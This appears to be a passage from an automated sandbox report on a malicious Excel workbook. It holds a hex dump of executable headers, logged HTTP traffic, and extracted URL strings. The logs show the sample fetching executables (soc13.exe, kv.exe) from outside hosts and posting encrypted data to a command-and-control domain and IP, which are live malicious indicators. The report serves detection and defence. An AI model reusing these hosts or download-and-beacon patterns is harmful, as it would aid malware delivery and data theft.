00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 ac 04 00 00 00 20 00 00 00 06 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 3c d7 13 00 00 30 00 00 00 d8 13 00 00 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 7f 03 00 00 10 14 00 00 80 03 00 00 ee 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 01 00 00 00 90 17 00 00 02 00 00 00 6e 17 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: GET /15.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: alamalidaa.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sm15sdsd.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 173Host: sm15sdsd.xyzData Raw: c8 76 7c 5d 48 a3 bb a8 d5 13 80 3c b6 52 18 af 79 5e d2 6d dc d2 2f 13 cc 6c c3 9d ae 18 6d c4 2b 52 f6 5f ac 7f b8 5e 20 b9 1d e8 c0 5f d8 31 ea b1 43 f9 4b 18 89 60 c3 f3 c9 9b c0 8f 73 a9 19 6c 15 b6 ed 11 17 b0 e6 12 0f e2 a5 b2 f6 a8 c6 e5 c3 8f 12 b3 5d 8a 7a ef fd 6e 70 d5 89 61 be 85 9b 29 41 99 51 c0 6f c9 a2 c6 ad ae 8e 67 13 7c 44 98 7c 2a b4 08 72 2a 3a d1 ae a8 e2 9d 1a 92 3b 98 b8 ba bf 29 e9 e2 2e f6 31 4f 9d 0b 52 f9 c8 e8 ad 7a 9d 46 38 5d 86 c8 65 f0 41 37 15 b1 a2 f3 9b af 71 6b b7 9d 2e 22 8c Data Ascii: v|]H<Ry^m/lm+R_^ _1CK`sl]znpa)AQog|D|*r*:;).1ORzF8]eA7qk."
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sm15sdsd.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 140Host: sm15sdsd.xyz
                      Source: global trafficHTTP traffic detected: GET /soc13.exe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: ptc-latam.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sm15sdsd.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 238Host: sm15sdsd.xyz
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sm15sdsd.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 266Host: sm15sdsd.xyz
                      Source: global trafficHTTP traffic detected: GET /kv.exe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.92.128.201
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sm15sdsd.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 138Host: sm15sdsd.xyzData Raw: c8 76 7c 5d 48 a3 bb a8 d5 13 80 3c b6 52 18 af 79 5e d2 6d dc d2 2f 13 cc 6c c3 9d ae 18 6d c4 2b 52 f6 5f ac 7f b8 5e 20 b9 1d e8 c0 5f d8 31 ea b1 43 f9 4b 18 89 60 c3 f3 c9 9b c0 8f 73 a9 19 6c 15 b6 ef 11 16 b0 e6 12 0f e2 a5 b2 c1 f2 ea 8a b6 a1 31 a5 18 e0 0a a3 81 21 31 b5 d3 11 d7 ab e0 35 14 a3 76 a1 24 e0 a3 d6 f6 9f db 0a 12 65 32 9f 07 47 b2 02 38 49 24 ef f5 9e 82 9c 62 cc 73 82 c9 bf 8e 32 fe bd Data Ascii: v|]H<Ry^m/lm+R_^ _1CK`sl1!15v$e2G8I$bs2
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sm15sdsd.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 423Host: sm15sdsd.xyzData Raw: c8 76 7c 5d 48 a3 bb a8 d5 13 80 3c b6 52 18 af 79 5e d2 6d dc d2 2f 13 cc 6c c3 9d ae 18 6d c4 2b 52 f6 5f ac 7f b8 5e 20 b9 1d ac 85 0c 93 65 a5 e1 6e ce 7a 2e dd 57 f4 c2 c9 9b c0 8f 73 a9 19 cc 14 b6 e8 11 17 b0 e6 12 0e e2 a5 b2 88 c9 ef 8c c9 bd 1c d4 2a f1 6d c5 85 0c 53 a3 b1 69 dd b5 94 3f 49 8f 63 8d 7b c0 cc de c4 82 e9 15 09 15 2d ab 1d 29 f0 4f 57 2b 14 d5 a1 9f c6 9e 6e d3 76 eb cc 97 b8 26 ec c9 0b c9 41 66 e3 29 3b fc e7 f6 d7 43 80 74 4a 69 fc f8 6c c7 63 68 0b a6 ac d4 9d e5 4d 6f d1 b3 3c 35 d8 08 d5 d8 6f ae 96 d8 16 d8 9a 13 c1 d7 16 00 bd 3a d2 a3 61 a2 58 12 a5 bc 81 57 29 85 a5 c1 cf 2b 0f aa 31 eb ac 9c 74 5a d5 df 97 6d 61 aa 5d 23 72 23 ab c6 8b 5e 1b f0 c2 4c e9 67 04 a0 c6 0d 34 e8 bf 95 b0 ff 06 e6 03 1d a6 4d e6 f5 52 92 79 24 08 29 68 52 f6 81 df b2 c7 fb 88 f2 5a a2 82 1b b5 95 2e ab 56 53 db b7 39 54 92 2a da b7 3d 5f 93 08 29 1b fd 5b 5f b1 2e 4d 59 38 66 ef c7 06 e8 1f 86 82 96 fc 65 af fb 5c 51 f7 c3 15 6d 94 df 37 f1 65 49 7b 95 f8 fb 2f d4 2d b7 36 5b e7 67 3b 1f d3 ee 52 53 4c d7 11 00 94 90 b8 25 c4 a7 8d 74 b5 59 62 8d ad 91 bf 59 e6 a5 36 0f 17 08 54 d4 7e c4 bc 69 e8 55 6b b0 d0 e0 f1 d1 ea e9 06 ef ca bc e9 7d 7d c5 af 9b 2b 72 8c 37 84 98 b4 3f 79 21 bb 99 05 7e c7 fb da 8f 1d 52 f6 d2 f8 89 c2 e9 58 52 Data Ascii: v|]H<Ry^m/lm+R_^ enz.Ws*mSi?Ic{-)OW+nv&Af);CtJilchMo<5o:aXW)+1tZma]#r#^Lg4MRy$)hRZ.VS9T*=_)[_.MY8fe\Qm7eI{/-6[g;RSL%tYbY6T~iUk}}+r7?y!~RXR
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.92.128.201
                      Source: C:\Users\user\AppData\Local\Temp\A185.exeCode function: 18_2_00404A6A ioctlsocket,connect,connect,select,ioctlsocket,WSAIoctl,select,recv,18_2_00404A6A
                      Source: global trafficHTTP traffic detected: GET /15.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: alamalidaa.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /soc13.exe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: ptc-latam.com
                      Source: global trafficHTTP traffic detected: GET /kv.exe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.92.128.201
                      Source: unknownDNS traffic detected: queries for: alamalidaa.com
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sm15sdsd.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 173Host: sm15sdsd.xyzData Raw: c8 76 7c 5d 48 a3 bb a8 d5 13 80 3c b6 52 18 af 79 5e d2 6d dc d2 2f 13 cc 6c c3 9d ae 18 6d c4 2b 52 f6 5f ac 7f b8 5e 20 b9 1d e8 c0 5f d8 31 ea b1 43 f9 4b 18 89 60 c3 f3 c9 9b c0 8f 73 a9 19 6c 15 b6 ed 11 17 b0 e6 12 0f e2 a5 b2 f6 a8 c6 e5 c3 8f 12 b3 5d 8a 7a ef fd 6e 70 d5 89 61 be 85 9b 29 41 99 51 c0 6f c9 a2 c6 ad ae 8e 67 13 7c 44 98 7c 2a b4 08 72 2a 3a d1 ae a8 e2 9d 1a 92 3b 98 b8 ba bf 29 e9 e2 2e f6 31 4f 9d 0b 52 f9 c8 e8 ad 7a 9d 46 38 5d 86 c8 65 f0 41 37 15 b1 a2 f3 9b af 71 6b b7 9d 2e 22 8c Data Ascii: v|]H<Ry^m/lm+R_^ _1CK`sl]znpa)AQog|D|*r*:;).1ORzF8]eA7qk."
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 15 Oct 2020 17:51:59 GMTServer: Apache/2.4.6 (CentOS) PHP/5.6.40X-Powered-By: PHP/5.6.40Keep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=windows-1251Data Raw: 36 64 64 36 35 0d 0a 18 00 00 00 58 bc 34 8a 0d 42 9e 49 6f af 1f fb e0 6d 9c 48 71 53 53 0e 4f 3a d4 35 00 48 dd 06 00 7a 2b 64 5f 0b 0f 07 00 0f 00 9e 03 00 00 18 82 5b 5f 7d 98 d9 47 7d 1a c3 22 18 00 41 00 73 25 7e 88 cb 3d 0f c3 2b ba 98 b6 8e 4d 8b 51 d5 7b 0a 1a 9e 31 b6 eb 2d be 9e ad 42 05 e0 0c 4a b8 5f 49 ad 59 fc fa 6a b3 62 4e 53 99 09 b8 78 6d 8b 77 f9 c8 05 b0 87 64 0a f2 85 50 41 54 24 17 a5 62 39 63 ea 81 c8 1d b9 1f 0b f8 1d 81 11 dc 3e e4 9f be 4d b3 17 93 83 4c 5d 78 98 b3 0a 23 ef 74 9e c5 70 38 4a 85 44 6c f8 61 5e 25 a9 34 a0 ef ba f7 b5 fb 44 f4 3f db 22 51 0a 08 4f ad 63 48 9f 37 7e 8a 65 a4 6b e3 00 27 ae 03 97 fc bd 8f 69 2f ba 1a ba 33 c4 33 c4 66 c2 68 bc 62 15 65 1c 45 76 a3 8c 9e ef f7 4a 76 2b 9f aa 4b e1 09 61 89 c2 b2 c4 01 3f d8 73 56 d1 0b 4f b7 aa 7a 2f e4 0c f7 ad c4 07 ee 30 c3 80 77 b2 28 93 82 a0 e2 d5 0c 36 30 97 f6 0e 61 d6 14 91 ee f8 92 d0 2b a9 27 4e 11 7b a9 ca 5a ce 88 a9 7f 8c 88 85 5b e5 91 d3 80 4f 1a 83 ec fc cd e7 4e 68 59 2a ee 04 d4 91 40 34 60 40 a6 40 08 19 61 b2 34 9e 69 14 08 4f 5c 1e ac a3 b9 94 35 ee a4 3c 83 4b 07 10 f7 9d 99 d3 73 d6 39 19 67 4e 1b 11 3a 35 ad a0 3b 56 e1 94 54 c3 a4 33 22 f6 bb b3 5b 61 1e d6 db 69 63 26 c9 7d 9a 81 9a 49 e8 86 1c 56 96 1a 48 52 4e 8d e5 d7 02 69 ea f2 89 b3 81 c0 71 b7 04 88 3d 81 a0 63 5e 87 81 c6 c3 7a 07 1e 17 60 a3 55 4d c1 99 e8 54 3f 32 8f f3 7a 05 91 8b 69 79 67 78 3d ea af 6f 2e 60 7d 81 8f 53 c0 e2 e1 20 ef 92 9d 51 e8 99 66 c3 17 fe be 49 bd 32 b2 e8 cb a1 04 12 9f b1 c0 85 ca 6c d8 11 06 b7 c9 02 71 2b 1e dc c0 5b 19 48 0f a4 f7 b8 fb c2 59 41 76 96 e7 59 5b 2a 49 04 0f f6 5e 56 c1 67 86 59 6f 63 b6 43 9a 88 67 3d 9f f7 eb 7c 66 03 24 e3 25 10 09 d5 ba 15 55 20 99 01 b4 e4 56 38 0e 0c 9a e6 ed f4 ae 23 d7 8e d1 00 dc d4 95 04 57 e3 f8 e6 f5 1a 63 34 6a b6 95 80 70 8b ad c5 52 50 4b 2f 80 87 bf b1 eb 4b d4 22 c3 24 eb e5 62 1f 92 4b 53 fc b7 2d 5a 30 18 69 cd d4 8a 4f f3 25 83 ce 75 30 30 2c 5c 54 15 ea ee 1d 3a 0b 63 5e e9 58 22 a0 69 b6 4c 28 ce 20 ad 94 85 a2 a0 e2 f8 ee 91 1b e5 56 6c b5 3a 16 28 13 bf 29 ee fc 3b f9 b2 41 32 f6 2f b9 03 e4 03 49 76 77 d1 e5 3c 07 16 dc b3 24 d8 4e 82 53 3f 63 b8 76 86 a7 7b 46 45 d2 1a 99 7f b4 69 dd d9 80 d2 b8 ec c6 a1 28 30 e3 ba cd 2e 90 89 f8 87 e1 67 30 ca ae fd 29 d9 e3 4e 45 11 61 c1 79 35 1a 71 12 2c 89 7a e5 ee ba de b4 52 2d e5 4d a8 2a 09 ed 8d e0 c5 c5 05 c8 a8 b5 5a fa 5e 25 dc 4d 23 4c 25 cb 68 52 92 ce bf ea 47 2d 58 6a 32 83 f9 19 c6 5d 55 b3 ba 9f 27 a1 55 99 36 22 5d 7c 2f 6d ae c0 5d a3 79 e4 98 4f a8 60 df 25 33 61 8e ba 97 e0 01 49 74 ed eb b6 4a a8 af db 89 ea 3c e8 20 75 33 2a cd fa 45 43 6f 95 bf c3 3d f2 78 17 ed 2c b2 0e 05 04 a3 4f 29 2d c3 d3 9b 88 a6 56 95 1a f3 a3 ec 14 a4 b7 79 4b 95 0a 7e 47 01 a6 2f f3
                      Source: Document 8402.xlsbString found in binary or memory: http://alamalidaa.com/15.gif
                      Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
                      Source: explorer.exe, 0000000B.00000003.371345378.0000000008043000.00000004.00000001.sdmp, explorer.exe, 0000001A.00000002.392831410.00000000006C8000.00000004.00000020.sdmpString found in binary or memory: http://sm15sdsd.xyz/
                      Source: explorer.exe, 0000001A.00000002.392831410.00000000006C8000.00000004.00000020.sdmpString found in binary or memory: http://sm15sdsd.xyz/Mozilla/5.0
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
                      Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: explorer.exe, 0000000B.00000000.305309084.0000000006840000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                      Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                      Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
                      Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: B7AE.exe, 00000018.00000003.411696862.0000000002411000.00000004.00000001.sdmpString found in binary or memory: http://www.ip-adress.com
                      Source: B7AE.exe, 00000018.00000003.411696862.0000000002411000.00000004.00000001.sdmpString found in binary or memory: http://www.ip-adress.com?
                      Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
                      Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
                      Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: explorer.exe, 0000000B.00000000.315262521.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://api.aadrm.com/
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://api.diagnostics.office.com
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
                      Source: A185.exe, dmxhr.exe, 00000017.00000003.378395734.00000000011A0000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org/
                      Source: A185.exe, 00000012.00000002.376547768.0000000000400000.00000040.00020000.sdmp, dmxhr.exe, 00000017.00000003.378395734.00000000011A0000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org/https://ip4.seeip.org/runasMicrosoft
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://api.microsoftstream.com/api/
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://api.office.net
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://api.onedrive.com
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://apis.live.net/v5.0/
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://augloop.office.com
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://augloop.office.com/v2
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://cdn.entity.
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://clients.config.office.net/
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://config.edge.skype.com
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://cortana.ai
                      Source: 6045CB5A-2A33-4841-A0B1-CE172B9CAF59.0.drString found in binary or memory: https://cr.office.com
